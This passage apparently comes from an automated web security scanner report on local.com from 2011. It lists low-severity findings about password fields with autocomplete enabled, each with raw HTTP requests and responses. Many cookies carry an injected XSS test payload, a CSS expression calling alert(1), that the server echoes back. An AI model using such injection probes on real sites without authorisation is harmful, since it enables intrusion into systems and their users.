__qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 77820
Date: Thu, 03 Feb 2011 16:38:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:38:55 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Business+Home|home|%2fbusiness%2f~Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 77820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX - Search for local
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.3. http://www.local.com/business/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /business/?location=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 77815
Date: Thu, 03 Feb 2011 16:39:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:39:53 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Business+Home|home|%2fbusiness%2f%3flocation%3dDallas%252c%2bTX~Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 77815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX - Search for local
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.4. http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/dallas-tx/amegy-bank-97648000/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /business/details/dallas-tx/amegy-bank-97648000/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 116008
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:01 GMT
Connection: close
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=local.com; expires=Thu, 03-Feb-2011 16:31:01 GMT; path=/
Content-Length: 116008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Amegy Bank in Dallas, TX - (
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.5. http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/dallas-tx/cet-products-liquidators-9985416/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /business/details/dallas-tx/cet-products-liquidators-9985416/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 91928
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:00:47 GMT
Connection: close
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Cet+Products+%26+Liquidators|Dallas%2c+TX|Appraisal+And+Liquidation+Services|11134700|9985416; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186474914335; domain=local.com; expires=Thu, 03-Feb-2011 16:30:47 GMT; path=/
Content-Length: 91928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Cet Products & Liquidators in
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.6. http://www.local.com/business/details/dallas-tx/equity-bank-63975058/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/dallas-tx/equity-bank-63975058/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /business/details/dallas-tx/equity-bank-63975058/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 115967
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:00:47 GMT
Connection: close
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569; domain=local.com; expires=Thu, 03-Feb-2011 16:30:47 GMT; path=/
Content-Length: 115967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Equity Bank in Dallas, TX -
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.7. http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/dallas-tx/hillcrest-bank-104826937/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /business/details/dallas-tx/hillcrest-bank-104826937/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 116644
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:00 GMT
Connection: close
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Hillcrest+Bank|Dallas%2c+TX|Retail+Banks|15020100|104826937~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186602212783; domain=local.com; expires=Thu, 03-Feb-2011 16:31:00 GMT; path=/
Content-Length: 116644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Hillcrest Bank in Dallas, TX
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.8. http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/dallas-tx/sterling-bank-16856575/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /business/details/dallas-tx/sterling-bank-16856575/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 116910
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:00 GMT
Connection: close
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Sterling+Bank|Dallas%2c+TX|Retail+Banks|15020100|16856575~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186605902360; domain=local.com; expires=Thu, 03-Feb-2011 16:31:00 GMT; path=/
Content-Length: 116910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Sterling Bank in Dallas, TX -
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.9. http://www.local.com/business/details/map/dallas-tx/amegy-bank-97648000/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/map/dallas-tx/amegy-bank-97648000/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /business/details/map/dallas-tx/amegy-bank-97648000/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 39485
Date: Thu, 03 Feb 2011 16:38:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:38:18 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 39485

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Amegy Bank in Dallas, TX - (
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.10. http://www.local.com/business/details/map/dallas-tx/cet-products-liquidators-9985416/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/map/dallas-tx/cet-products-liquidators-9985416/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /business/details/map/dallas-tx/cet-products-liquidators-9985416/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; 